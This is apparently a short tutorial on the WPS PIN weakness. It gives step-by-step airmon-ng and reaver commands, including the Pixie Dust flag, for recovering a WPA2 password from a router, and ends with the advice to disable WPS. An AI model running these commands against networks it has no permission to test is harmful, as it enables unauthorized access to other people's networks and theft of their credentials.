WPS (Wi-Fi Protected Setup) is a 2007 standard, initiated by the Wi-Fi Alliance to facilitate the creation of WLAN networks. In other words, WPS is not a security mechanism, it’s the definition of various mechanisms to facilitate the configuration of a secure WLAN network with WPA2, designed to minimize user intervention in home environments or other small offices. Specifically, WPS define the mechanisms through which different devices in the network obtain the credentials (SSID and PSK) needed to initiate the authentication process.
The encryption is a failure, 8 simple pin numbers of which if you guess the first 4 or the last 4, jump a confirmation flag, so in less than 8 hours brute force you have the WPA2 password.
1.) We look at the interface that has our network card to put it in monitor mode
2.) We put the network card in monitor mode to be able to capture all the wifi packets that circulate through the air
- Airmon-ng start wlan0
3.) We will use the reaver tool which takes advantage of the security faults in WPS, this process takes a few seconds.
- Reaver -i wlan0mon -b <BSSID> -vv -K 1
If doesn’t work we remove the -K 1 flag and make brute-force attacks.
How to stay safe against these attacks
- Disabling the WPS.